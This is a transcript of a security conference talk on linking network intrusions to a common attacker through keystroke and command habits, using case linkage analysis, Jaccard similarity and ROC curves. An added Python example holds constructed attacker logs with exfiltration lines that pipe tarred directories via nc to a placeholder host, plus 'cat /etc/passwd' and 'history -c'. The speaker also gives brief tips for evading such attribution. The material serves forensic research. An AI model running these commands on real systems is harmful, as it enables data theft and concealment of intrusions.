Next we have Matt, all the way from the UK. He works at PwC and he is going to talk about attribution and the hardest part of digital forensics: placing a person at a keyboard at a specific time. Let's give him a big round of applause.

Okay, hi everyone. Thank you very much for coming. So this is Betrayed by the Keyboard: how what you type can give you away. So just a disclaimer that it's for educational purposes only. In terms of what this talk isn't: did anyone come to my talk last year at DEF CON? A couple of people. You might be a little bit disappointed. So that talk was about drones and lasers and ultrasonic pulses, and I had some really nice feedback from people that said please do more of the same stuff next year. So this talk is all about inferential statistics. So my name is Matt Wixey. I'm not good at taking direction, apparently, and I lead research for PwC's cyber security practice in the UK. I work on the ethical hacking team. I'm a part-time doctoral researcher at UCL, and my previous job before PwC was working in law enforcement in the UK, leading a technical R&D team. So this talk is based on some research I did at UCL before my PhD. It's now been continued at PwC, and I have an interest in side channel attacks generally. But what I'm particularly interested in is something that I call human side channels, which is a kind of unconscious leakage of various cues that can together be brought together to try and link things and attribute things. My first degree was in English language and literature, so I have an interest in forensic linguistics and that kind of side channel approach as well. So I'm going to cover what attribution is and some problems with traditional approaches to it. I'm then going to move on to something called case linkage analysis, or CLA, which is a possible solution to that. I'm going to talk about an experiment I did at UCL to try and test that out, and cover the results and implications.
And then I'm going to sum up and give some ideas for future research in this area as well. So why would we want to do attribution? What are the benefits? What kinds are there? What kinds of approaches? So it's a bit of a hot topic in the literature in terms of what we mean by attribution. Some think it means identifying a location or a country or the organizations behind an attack. Others think it means putting an actual individual at the keyboard, and some people would think it means trying to find a machine that was responsible, or that was used, rather than a human. There are several benefits to doing it from an investigative point of view. There's an argument that you may deter future attacks; that's again been debated in the literature, but it's a perspective. Interrupting and disrupting ongoing attacks, and then, depending on which side of the fence you're on, it's a desirable outcome potentially. So Hutchins and others in 2011 categorized three different kinds of indicators of compromise, IOCs, that could be used for attribution. They talked about atomic IOCs, by which they mean things like IP addresses, email addresses, domain names, discrete identifiers basically. They also covered computed IOCs, by which they mean hash values for malware, for instance, and then behavioral IOCs: what an attacker does on a computer once they have access to it. Now there are all sorts of issues with some of these. So atomic IOCs, for instance, are the easiest to resolve, depending on the amount of resources that are available to you, generally the most effective and the most direct in terms of finding out who did what, but also the easiest from an attacker's perspective to spoof or obfuscate or anonymize. Computed IOCs are obviously only as good as the particular method you're using. So if you're using a hash value to identify malware, for instance, that's a perfectly valid approach, but slight changes to that malware will obviously result in a different hash value.
Along the same kind of lines, there are other methods of computed IOCs. So one that's used quite a lot is trying to correlate malicious activity with office hours in a particular time zone, for instance, and then say that the attack was perpetrated in a particular location. So that's been used in a few studies. It was used in a PwC investigation last year called Cloud Hopper. There's also the approach of trying to de-anonymize programmers and developers, either through their style, so the way that they write code, or through artifacts in compiled code. So Caliskan and others a few years ago looked at trying to de-anonymize developers through compiled binaries, and Caliskan and Greenstadt did a talk this year at DEF CON on an extended approach to that. You could also look at similarities in malware, in the capabilities that malware has, and try and use that as an attribution technique. So a good example of that would be Stuxnet and Duqu, which both had similar capabilities. And then finally you could try and just work out if it's a human doing the attack or a bot. And that was done a few years ago based on various things, and I'm going to talk a little bit more about that particular study later on. The problem with all of these is that you're not so much focusing on an individual. You're focusing maybe on trying to identify a state or a sponsor, something like that. And the challenge from an investigative perspective then becomes procedural or legal. Behavioral profiling, on the other hand, is really interesting. It's less about attribution, or has been historically in the literature. It's more about trying to understand who commits attacks and why they do it. So there have been various studies looking at attackers' motivations, their skill levels, the kind of culture that would drive them to attack, the psychological motivations for that, and that kind of thing. And then a subset of that category is attack profiling.
So this is looking at, once an attacker is on a machine, what do they do? And it's not so much about attribution; it's just trying to understand the process and the flow of the attack. So I mentioned this study: Filippoupolitis and others in 2014 looked at various metrics from attacks, so skill, typing speed, number of mistakes, that kind of thing, to try and work out if it was a human attacking or a bot. Similarly, there have been studies looking at the skill level of attackers and at specific attack behaviors on a compromised machine. So that's a really interesting approach. What hasn't really been covered in the literature is trying to use that as a comparison method: so looking at attack behaviors on a machine and trying to use that to see if you can generate some kind of attack signature, which can then be used to attribute attacks. So this leads me on to talk about case linkage analysis. Has anyone heard of case linkage analysis before? Okay, a couple of people maybe? Okay, so it's not a particularly well known method.

So to give you a bit of background, a few years ago I had an idea, which, trust me, is quite a rare event. So I was lurking in the OSCP labs; I was doing OSCP at the time. And if you've done OSCP, you'll know they have an IRC channel where all the students come together and talk about attack methods and various machines, that kind of thing. And just kind of observing the traffic and people talking to each other, I made a couple of casual observations. So the first is, everyone had their own way of doing something, whether that was trying to exfiltrate stuff, or search for stuff post exploitation, or, you know, download a binary to a compromised box, or whatever it was. And the second observation was that once someone had a particular preferred way of doing something, they would stick to it. They wouldn't really change it. Now that seems fairly obvious.
My first degree was in English Lit, and I pretty much discovered after the first three weeks of the first term that I could just make it up. So that's what I did for the next three years. And then apparently in science you actually have to provide evidence and actually prove things. You can't just kind of say, this is obvious. Academics tend to frown on that, surprisingly. So I wanted a way to kind of empirically test this assumption, and I came across this thing called case linkage analysis. So it's a methodology found in crime science. So crime science is a discipline, a kind of multidisciplinary approach to looking at how crimes can be prevented. So it's distinct from criminology: criminology is looking at why people commit crimes. Crime science is looking at, if you have a series of crimes that are being committed, for instance, what kind of interventions could you put in place to try and stop that. So CLA, case linkage analysis, is designed to link separate crimes to a common offender based on behaviors exhibited during the commission of an offense. So the benefits of doing this: you might not know who the individual is that's committed these linked offenses, but you can potentially investigate offenses as a series, so all together, so you can focus resources. It can be used evidentially. And there's also this speculation that the minority of offenders commit the majority of crimes. Now that's in terms of crime generally; that's debatable, but potentially with more specialist crimes it's more accurate. So if you want to try and link two separate crimes to a common offender, regardless of whether you know who that offender is, the best way to do that is through physical evidence: DNA, fingerprints, that kind of thing. The problem with that approach is that that evidence just might not be there, or, depending on the crime type, it might not apply.
So with network intrusion attacks, with cyber attacks, for instance, you're not going to have physical evidence in most cases. You might have kind of forensic artifacts, but they're not going to be unique in the same way that DNA and fingerprints are. They may not take you back to a specific individual either. So as an alternative, what you can do is use behavioral evidence: so very specific, very granular things that an offender does during the commission of a crime, either in order to perpetrate the offense, or to prepare for the offense, or something that they do that's coincidental to the offense. So the basic methodology is you classify those behaviors into certain behavioral domains, you create pairs of crimes, and you compare those two crimes together in terms of the behaviors that were exhibited. And then you try and determine a statistical degree of similarity between them. So it's not offender profiling. That's a fairly common misconception. So offender profiling seeks to make an inference about someone based on the assumption that what they do in the commission of a crime is going to be the same as what they do in everyday life. So if you were looking at a particular crime, you could say that, you know, based on those behaviors I infer that the perpetrator is a boring but very charismatic researcher from the UK, no one specific in mind. Case linkage analysis, on the other hand, is trying to make a statistical inference about the similarity of two or more crimes based on behaviors exhibited during both of them. So in this case, you might look at crime A, you know who's committed that, and you see it's got various features in common with crime B. Therefore, crime A and crime B may have been committed by the same person. So CLA has two main assumptions at the root of it that come out of personality psychology.
So there's behavioral consistency: the assumption that someone who's committing crimes is going to continue to commit crimes in the same way across a series, across time. And then there's behavioral distinctiveness. So the way an offender commits a particular crime is going to be distinguishable from the way that other people commit crime. And both of these have to be present, otherwise CLA doesn't really work. So I'll talk about this a bit later, but certain crimes are more suited to CLA than others. So if you look at something like homicide, for instance, a very common characteristic of that is dumping a body in a remote location. So that's consistent for many offenders, but it's not distinctive enough to be able to use that as grounds for CLA. So talking a bit more about personality psychology, there have been various papers on the way that people respond to things: the fact that the way we respond to stimuli is unique, or distinctive at least, and stable across time, because it's based on our upbringing and our education and our previous experiences. So Mischel and Shoda talk about something called CAPS, the cognitive-affective personality system, which basically says that every individual has their own system of reacting to things, of expectations and strategies, which is consistent yet distinctive. And these assumptions are made in other fields, other similar fields, around this kind of concept of human side channels. So if you look at something like forensic linguistics, for instance, which is based on the assumption that people have a stable yet distinctive writing style and a way of formulating sentences, a kind of predictable average sentence length, syllable count, structuring of paragraphs, that kind of thing. And it applies to some biometric methods, or kind of pseudo-biometric methods, as well. So you may have heard of some researchers proposing that typing speed or typing style be used as an additional authentication mechanism.
So as well as a password, you also have, you know, the speed at which someone types, in addition to that. So does it actually work? Well, the consensus in the literature is yes, in most cases. So it's been applied to a wide number of crime types: to burglary, arson, homicide, motor vehicle crime, and various others as well. So the methodology, if you want to apply CLA to something, what do you do? So you separate behaviors into particular domains, you calculate a similarity coefficient, which is a kind of coarse measure of the similarity between the two crimes you're looking at, you input that into a logistic regression model, and then you determine the optimal combination of domains. So of all the domains you're looking at, which are the best ones for predictive accuracy. And then you use something called receiver operating characteristic curves, which are just a further measure of predictive accuracy that kind of, they plot the probability of a true positive against a false positive.

Now as a former literature student, I hate statistics; I'm not very good at statistics. So I'm going to try and explain this, firstly, the way I wish it had been explained to me when I first started looking at this, but also for people who have no stats experience at all, I'll try and kind of walk you through. So we have two burglaries, burglary A and burglary B, and we want to find out if the same offender did both; we want to find out the probability that one offender did both. So the first thing we do is define something called a dichotomous independent variable. That basically means it's just a yes/no question, and it's the question that we're trying to answer. So in this case it would be: are these two burglaries linked? And what we want to find out is, of those behavioral domains we have, which of them contribute more to linkage or not being linked. So these behavioral domains, what do they look like, what are they?
Well, an example would be something like entry behaviors. So for a burglary you would look at how a burglar entered the property, what tools they used to do that, what time of day. A separate domain might then be property behaviors. So you look at what property was taken, what property was damaged, that kind of thing. All of these together are independent variables, and we make these dichotomous as well. So we just turn them into yes/no questions. So was a crowbar used, was a screwdriver used, that kind of thing. Then we apply this similarity coefficient. So in the literature regarding case linkage analysis, the most common one that's used is something called Jaccard's similarity coefficient. And this is the formula for it; you can see it's pretty basic. So you take a count of each individual behavior for each domain that's present in both of the offenses. You then look at behaviors present in crime A but not crime B, and then the inverse of that, and then you end up with a figure once you've run it through this formula. So if you get a result of one, that means the crimes are perfectly similar. Zero means they're perfectly dissimilar. Now crucially, Jaccard's ignores something called joint non-occurrences. So if a behavior didn't happen in either crime, it's not taken into account when calculating that coefficient. Now that's a concern when you're looking at real world crimes like burglary, or where there's been some kind of interaction with a victim, because victims don't always accurately report what's happened and the police don't always accurately record what's happened. It's less of a concern in this case, as you'll see, because we're going to basically record everything. So you put each of those coefficients into a direct logistic regression model. So logistic regression is a way to perform a kind of predictive analysis. So you want to find out to what extent a particular variable contributes to an outcome.
So you'd want to look at, if there's a similarity in the entry behaviors, to what extent does that predict whether or not those two burglaries are linked. And logistic regression gives us all sorts of information. It tells us whether a particular variable is positively correlated with the outcome, so whether it has actually contributed to it, or whether it's negatively correlated, so whether it's actually produced the opposite result. And it gives us a p-value. So in scientific experiments the p-value is very important. It basically tells you the probability of seeing a particular result if the null hypothesis is true. So a null hypothesis is the assumption that the two things you're looking at are not in any way related. So the lower the p-value, the better. So you would run these for each behavioral domain. You then run something called forward stepwise logistic regression. This is where you're trying to work out the optimal combination of behavioral domains. So you'd start with one. You add another domain at each step. You do different combinations. If it contributes to the predictive power you keep it; otherwise you get rid of it. And then finally you put those results into ROC curves. So as I mentioned, ROC curves are a graphical representation of the probability of a false positive against the probability of a true positive. And it kind of gives you a more reliable measure than logistic regression of the predictive accuracy. The value is based on something called the area under the curve, and I'll show you an example of what I mean by that in a second. And it also overcomes various kind of statistical issues of using logistic regression in particular contexts, which isn't very interesting, but it basically is a measure of the overall predictive accuracy. So this is an example of a ROC curve. So what you're essentially looking at here is the graphical representation of true positive versus false positive.
If you have a diagonal line across the graph, that basically means your model is performing no better than chance. The more area that's under the curve, the better predictive accuracy your model has. So a kind of categorization that's been suggested is: if you have an AUC value of 0.5 to 0.7, that's pretty low accuracy; 0.7 to 0.9 is good; and then anything above 0.9 is high. So there are some exceptions to the effectiveness of case linkage analysis. So I mentioned homicide earlier. There's also the issue that this isn't obviously going to be 100% guaranteed to work. Some offenders will show more distinctiveness than others. Some offenders will show less stability than others. So certain behaviors as well, within a particular offense, will be less consistent: so, for instance, particularly those which the offender doesn't have any control over. So property stolen during a burglary, for instance: the offender is not going to be able to control that, to some extent, because they don't know necessarily what's in the property. There's also the issue that an offender's MO is a learned behavior. So it's going to develop over time as offenders speak to other offenders, as, you know, new technologies come out and new practices come out. And crucially, they also change their behaviors in response to events. So this is why CLA is more effective for crimes which have less victim interaction. Because if you take something like a robbery, for instance, where an offender is threatening or using violence against someone, then the victim's response to the offender doing that will then potentially influence the offender's behaviors. And then most research that's been done on CLA has only applied to solved crimes. They've been relatively small samples as well. And typically it's been looking at only kind of serial offenses. So I'm going to talk to you now about the experiment that I did.
So I wanted to find out if CLA could be applied to cyber attacks, specifically in a situation where the attacker has got code execution on a machine. So this hasn't been done before. CLA has only previously been applied to real world crimes. So what I wanted to do is take very granular behaviors, so an attacker's keystrokes and the commands they're executing and the syntax they're using and the order of switches and commands, and work out if that could be used as a kind of attack signature to link together attacks committed by the same offender. So when designing this experiment, the kind of common approach in the literature is to use police data, crime reports. The issue with that, as I mentioned earlier, is they may be inaccurate, they may be incomplete. Victim accounts may be inaccurate because crimes are often traumatic and trauma can distort memories, that kind of thing. There's also the problem that police may not record all data. And when you're talking about network intrusion attacks, it's unlikely that crime reports are going to have the level of granularity needed in this instance. Another possible approach was using a honeypot: so, you know, exposing an SSH server with a weak password and just kind of sniffing what was coming in and then logging keystrokes. The issue with that is that because this methodology was previously untested for cyber attacks, I needed a kind of ground truth. I needed to know which attacks would link and which wouldn't. There's also the problem that even if I did get someone attacking, say, two servers, and then tried to match them together, even if they come from the same IP address, it doesn't guarantee that it's the same individual behind the keyboard. I'd also need to distinguish between bots and humans, which is an exercise in itself. There's also the issue that honeypots can be fingerprinted, which may influence attack behavior.
So I took an open source SSH keylogger written in Python that uses strace to log keystrokes over that process, spun up two virtual machines, exposed them on the internet over SSH, configured one account per user per box (there were 10 users in total), configured each one with deliberate privilege escalation vulnerabilities, and then put some tasty looking data on there for attackers to exfiltrate. I got 10 volunteers to participate, so a mixture of pen testers and enthusiasts and students. And I asked them to SSH into both machines, so they had a low privilege shell, asked them to try and escalate their privileges, to steal data, to try and cover their tracks, and generally just kind of poke around the file system and see what was there. And while they were doing that, I was recording all of their keystrokes using this keylogger. So the hypothesis was that as attackers are doing that, they will be consistent and distinctive in the same way that other offenders are with other crimes, which will enable me to try and link together two separate offenses committed by the same attacker. So I ended up with three behavioral domains: navigation, which is, you know, how attackers were moving through the file system; enumeration, their kind of local reconnaissance on that system; and then exploitation, which covered both privilege escalation attempts and exfiltration attempts. I also looked at three metadata variables. So these are not behavioral, but they're looking at the number of milliseconds between each keystroke, the number of milliseconds between each command, and then the number of backspaces expressed as a percentage of all keystrokes. So these metadata variables are obviously non-dichotomous; they're not yes/no answers, they're just values.
The reason I chose to do that is that in other CLA work, in addition to the granular behavioral domains, people have also looked at things like inter-crime distance and temporal proximity, and that's kind of had some promising results as well. Previous researchers have also looked at things like commands typed per second, which potentially has issues because that's going to be influenced by the length of the command and time to complete and that kind of thing. So these are some examples of the kind of behaviors that I was looking at once these volunteers had finished. So you can see they're pretty granular. There are subtle distinctions between some of them. So you have navigation behaviors in the first two columns on the left, and then the two columns on the right are exploitation behaviors. So on average, each participant spent about two hours, just over two hours, on each host, issuing an average of 243 commands on each host. Two of them got root on the first VM and one of them got root on the second. So there were 10 attackers, two machines, 100 crime pairs, of which 10 were linked and 90 were unlinked. So what I did was compare each attack against the first VM with each attack on the second VM, and calculated the similarity coefficient automatically using a tool I wrote that gave me a CSV file. So here are the similarity coefficients. So you can see, if you look at the first column, which is the mean average, and compare it across the variables, you can see that linked offenses have a much higher mean similarity coefficient than unlinked offenses, which is promising to start with. For the metadata variables, again looking at that mean column, you can see that linked offenses have slightly lower values than unlinked offenses, which again is promising, because you're looking at things like the similarity between the keystroke intervals and that kind of thing.
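The scoring step the speaker describes (Jaccard's coefficient per behavioral domain over every VM1/VM2 crime pair, then the area under the ROC curve as the measure of how well each domain separates linked from unlinked pairs), as an added Python example. It is not the speaker's tool or the study's data: the three attackers, their command logs and the behavior variables are all constructed, and the AUC is computed directly from the ranked coefficients (the Mann-Whitney form) rather than through a logistic regression in SPSS.

```python
import re
from itertools import product

# Dichotomous behaviour variables grouped into the talk's three domains. The individual
# variables (and the regexes that detect them) are constructed for this example; they are
# not the coding scheme used in the study.
BEHAVIOURS = {
    "navigation": {
        "ls_la": r"^ls\s+-la\b",
        "ls_l": r"^ls\s+-l(\s|$)",
        "cd_dotdot": r"^cd\s+\.\.",
        "cd_absolute": r"^cd\s+/",
        "pwd": r"^pwd\b",
    },
    "enumeration": {
        "uname": r"^uname\b",
        "cat_passwd": r"^cat\s+/etc/passwd",
        "sudo_l": r"^sudo\s+-l\b",
        "find_perm": r"^find\s+/.*-perm",
        "ps": r"^ps\b",
    },
    "exploitation": {
        "wget": r"^wget\b",
        "curl": r"^curl\b",
        "nc": r"^nc\b",
        "tar": r"^tar\b",
        "history_c": r"^history\s+-c\b",
    },
}

# Constructed command logs: one session per attacker on each VM (three attackers here rather
# than the study's ten). "bob" switches from curl to wget on the second box, the kind of
# conscious tool change the talk later mentions as a way of weakening linkage.
SESSIONS_VM1 = {
    "alice": ["ls -la", "cd ..", "pwd", "uname -a", "sudo -l", "wget http://example.invalid/t"],
    "bob": ["ls -l", "cd /tmp", "cat /etc/passwd", "find / -perm -4000 2>/dev/null",
            "curl -o t http://example.invalid/t", "history -c"],
    "carol": ["cd /home", "ls -la", "pwd", "ps aux", "uname -a",
              "tar czf /tmp/h.tgz /home", "nc example.invalid 4444 < /tmp/h.tgz"],
}
SESSIONS_VM2 = {
    "alice": ["ls -la", "pwd", "cd ..", "uname -a", "sudo -l", "cat /etc/passwd",
              "wget http://example.invalid/t"],
    "bob": ["cd /var/www", "ls -l", "find / -perm -4000 2>/dev/null",
            "wget http://example.invalid/t", "tar czf /tmp/w.tgz /var/www", "history -c"],
    "carol": ["pwd", "cd /etc", "ls -la", "ps -ef", "uname -r",
              "tar czf /tmp/e.tgz /etc", "nc example.invalid 4444 < /tmp/e.tgz"],
}


def code_session(commands):
    """Reduce one session's typed commands to {domain: set of behaviour names observed}."""
    observed = {domain: set() for domain in BEHAVIOURS}
    for cmd in commands:
        for domain, variables in BEHAVIOURS.items():
            for name, pattern in variables.items():
                if re.match(pattern, cmd.strip()):
                    observed[domain].add(name)
    return observed


def jaccard(a, b):
    """Jaccard's coefficient: shared / (shared + only in A + only in B).
    Behaviours absent from both sessions (joint non-occurrences) never enter the formula."""
    shared, only_a, only_b = len(a & b), len(a - b), len(b - a)
    total = shared + only_a + only_b
    return shared / total if total else 0.0


def auc(linked_scores, unlinked_scores):
    """Area under the ROC curve, computed as the probability that a random linked pair
    scores above a random unlinked pair (ties count half). 0.5 is chance, 1.0 is perfect."""
    wins = sum(1.0 if l > u else 0.5 if l == u else 0.0
               for l in linked_scores for u in unlinked_scores)
    return wins / (len(linked_scores) * len(unlinked_scores))


def link_attacks(sessions_vm1, sessions_vm2):
    """Score every VM1 x VM2 pair per domain, label it linked when the same attacker produced
    both sessions, and return (per-domain AUC, list of (attacker1, attacker2, linked, scores))."""
    coded1 = {name: code_session(cmds) for name, cmds in sessions_vm1.items()}
    coded2 = {name: code_session(cmds) for name, cmds in sessions_vm2.items()}
    pairs = []
    for (a1, s1), (a2, s2) in product(coded1.items(), coded2.items()):
        scores = {d: jaccard(s1[d], s2[d]) for d in BEHAVIOURS}
        pairs.append((a1, a2, a1 == a2, scores))
    aucs = {d: auc([p[3][d] for p in pairs if p[2]],
                   [p[3][d] for p in pairs if not p[2]]) for d in BEHAVIOURS}
    return aucs, pairs


if __name__ == "__main__":
    domain_auc, pair_table = link_attacks(SESSIONS_VM1, SESSIONS_VM2)
    for a1, a2, linked, scores in pair_table:
        cells = "  ".join(f"{d}={v:.2f}" for d, v in scores.items())
        print(f"{a1:>5} vs {a2:<5} linked={str(linked):5} {cells}")
    print("AUC per domain:", {d: round(v, 3) for d, v in domain_auc.items()})
```

On this constructed data, navigation and enumeration separate linked from unlinked pairs perfectly (AUC 1.0), while bob's tool swap drops the exploitation domain to about 0.92 and leaves one unlinked pair scoring above a linked one.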
So I then imported the results of that into a package called SPSS, which I don't like, as you might be able to tell. And then I performed direct logistic regression for each of those behavioral domains and then forward stepwise logistic regression. So that resulted in six models in total, and then a seventh model which was the optimal combination of each domain. So this is the slide that you've all been waiting for very patiently. So, yeah, thank you. I had a backup. I genuinely wasn't thinking that was going to get applause. So I've watched a lot of Black Hat and DEF CON talks over the last couple of years. So I've put something on the next slide which I think is probably statistically guaranteed to get me a round of applause. Okay, so that big table that I showed you, what does that tell us? It tells us that those three behavioral domains are able to classify linked and unlinked offenses with a very high level of accuracy. And I'll show you some more of the results a bit later; it's a bit easier to see. The upshot of all of this is that navigation was the most effective predictor, then exploitation, then enumeration, with a really strong positive correlation to that outcome of linked or unlinked. The metadata variables were much less successful. So keystroke and command intervals, not reliable at all. Backspaces, percentage of backspaces, a very weak negative correlation, but not statistically significant. So that p-value that I mentioned earlier was pretty high for that. So you can't really kind of count that as a result. So I then put these results into ROC curves, and these are the results. So the column to focus on, or the two columns to focus on, are the AUC column and the Sig. column. So Sig. is the p-value, AUC is the area under the curve. Remember, the closer we are to one, the greater predictive accuracy this has got. So you can see that the first three behavioral domains are very high.
Navigation, 0.992, is the best, then exploitation, 0.964, then enumeration, 0.912. As you can see, the metadata variables, keystroke interval and command interval, didn't really perform any better than chance. Backspaces were okay, 0.7, so it's a kind of, you know, a medium level of accuracy. So 0.922 is great. Now I've put that on there because the cool kids told me that Jay-Z is a Roc-A-Fella, which I assume means he's got an interest in inferential statistics and predictive accuracies. So these are the ROC results, just to reiterate. So the optimal model, in this particular study at least: if you combine navigation and enumeration, you've got predictive accuracy of 100%. Now I'm suspicious of anything that's 100%, and I'll come on to the kind of caveats of this research and kind of threats to validity towards the end. So what are the implications of this? What does this actually mean? Well, it means that potentially cyber attacks, network intrusion attacks where an attacker has command execution through an interactive shell, potentially have high levels of consistency and distinctiveness, particularly with navigation and enumeration. A theory that I have around why navigation particularly was so useful is that it's something that we do every day, okay? So whether we're using our own computers, assuming we're using Linux, which is what this one was, and which I believe most of the participants who took part in this study do, it's just something you do out of habit, whereas things like enumeration and exploitation, you're only really going to do that when you're actually attacking a host. These were higher levels of accuracy than have been reported for other crime types in the CLA literature, and a possible reason, again, for this would be that the behaviors exhibited in this kind of attack, or this kind of crime, are less subject to influence. So there aren't any victims directly involved necessarily.
Offenders may kind of change some of their approach depending on security mechanisms in place, that kind of thing, but generally their granular command choice is not really going to differ. It's going to be quite difficult to influence that. The metadata variables were not as good at all, suggesting that what you type is much better for trying to link crimes than how you type. Now, with the intervals, the keystroke intervals and command intervals, network latency may have affected some of the results and skewed them, but the mistakes and typos potentially show some promise, and maybe that's worth a bit of further research. It does need some further exploration. So the implications for investigators are that you can potentially link separate offenses to common offenders, regardless of whether or not you know who that offender is, without having to rely on atomic IOCs or computed IOCs. But you do need a lot of information. So you need to get as granular as possible. You essentially need to be in a position to capture commands and keystrokes. So the easiest way to do that would be with something like a high interaction honeypot, assuming that the attacker is not going to become aware that they're on a honeypot, which would then kind of influence the results. You could try and do it with just really verbose logging and look at kind of other aspects other than keystrokes and commands. You could also use something like a backdoor CTF if you wanted to try and do that, or vulnerable VMs or something. And potentially you could try and link attackers who've trained together, or have been trained by the same person, or who have done the same kind of qualification. Now that kind of does dilute this assumption that everyone has a distinctive way of doing things, but it could still assist, and that's something that I want to look at going forward.
Now, there are implications for privacy here as well, in that you can potentially be linked to separate hosts or separate identities just based on the way you type, regardless of what other measures you have in place and how good your opsec is. Just the way that you structure commands and use command switches and syntax could potentially influence that and could lead to you being linked to other things. So, like forensic linguistics, the whole concept of this is exploiting stable behavioral traits. And as I mentioned, it shouldn't be 100% accurate, and it potentially affects less of the population. So forensic linguistics will obviously affect everyone who's literate. This would affect far fewer people, and this study only focused on commands that attackers were entering. You could kind of widen this to look at more general typing behaviors. So, things that people do on keyboards that aren't necessarily the actual text that they're typing, but just kind of around that, how they kind of navigate through a document, that kind of thing. So if someone's in a position to log your keystrokes, you've got pretty big issues anyway. And if someone wants to try and identify you, then they're going to be able to do that without going to this length of bother. But this is more about attribution via linkage. So what this means is that you could be linked to historical or future activity that might be done under a different pseudonym or a different identity. So how could you defeat it? Well, it's pretty similar to trying to defeat forensic linguistics, trying to defeat authorship identification. You really want to try and consciously disguise the way that you're approaching a particular task.
Now, with forensic linguistics, there are various solutions that have been proposed, from the very crude, so just putting stuff through Google Translate a number of times, to the very sophisticated, where you're actually kind of swapping out punctuation and you're kind of randomly putting punctuation in different places. And there have been talks about that before and studies on that before. CLA is slightly different. So trying to do this in an automatic way is going to be pretty difficult, because you can't necessarily predict the commands that you're going to use in advance. You could try and kind of semi-automate it, I guess. So, talking about Google Translate and forensic linguistics, as a quick sidebar, I just wanted to talk about this because I think this is really cool. So this is a bot that my colleague at PWC created called Insightful Robot. And it takes famous quotes from books and films and it runs them through Google Translate 13 times and then tweets the answer at 10 a.m. every day. So it's just kind of an illustration of how badly Google Translate kind of mangles the sense of what you're trying to say. I thought I'd have a go at this as well. So this is a line of text that I put into it, translated it six times through various languages, and ended up with that, which obviously bears kind of no resemblance to what I was initially saying. So conscious changes, manual changes, are probably the best way to do it. So you could do things like randomize the ordering of command switches if you have multiple switches on a particular command. You could try and switch up tools, so you could use wget instead of curl. You could use vi instead of nano, although that might start a war, kind of, saying that. So I mentioned earlier threats to validity. So this was a very small sample of people. It's only 10 people, because this has never been done before, because of kind of limited time and resources, that kind of thing. So this is very much a proof of concept.
There wasn't real-world data, for the reasons that I explained previously. There's also the fact that the participants were volunteers and they knew they were participating in an academic experiment. They knew they had permission to attack those machines with no fear of reprisal. It's also Linux only and only looked at one scenario, so remote access over SSH to a low-privileged shell. And then crucially, there's also the point that I asked those participants to try and escalate privileges and exfiltrate stuff. And in the wild, attackers might not always want or need to escalate their privileges, depending on what their objective is. So to sum up, then, there's a lot of future research I think that could be done in this area. One would be to look at the effect of expertise, so the effect that skill level has on predictive accuracy and linking; temporal proximity, so looking at an attack by one attacker now and then looking at it again in six months' time; looking at real-world data; doing further research into those metadata variables; stochastic analysis to try and predict what an attacker might type next; looking into more scenarios, scenario diversity. So in particular, if you can see my blackout talk, where I talked about false personas online and different kinds of social media profiles operated by one person, this is a potential approach to trying to attribute different social media profiles to one individual based on the granular behaviors that are displayed during the maintenance of that profile. And then trying to just automate this, because this took a long time to do. SPSS is not my friend. So trying to automate this would be really cool as well. So do get in touch if you want to discuss. That's my Twitter handle and my email address. If you're interested in collaborating, or just want to find out more, then let me know. So to sum up, this is a really small study and pretty novel; it's never been done before.
Some promising results, potentially some pretty significant implications for both investigators, from an attribution perspective, and for privacy. It does need kind of further research and work. So all the references that were used in this talk are here in the slide deck. If you want to have a look at them, there's a white paper available, if you want to have a look at that as well. There's my contact details again, if you want to get in touch. And that's it for me. Thank you very much.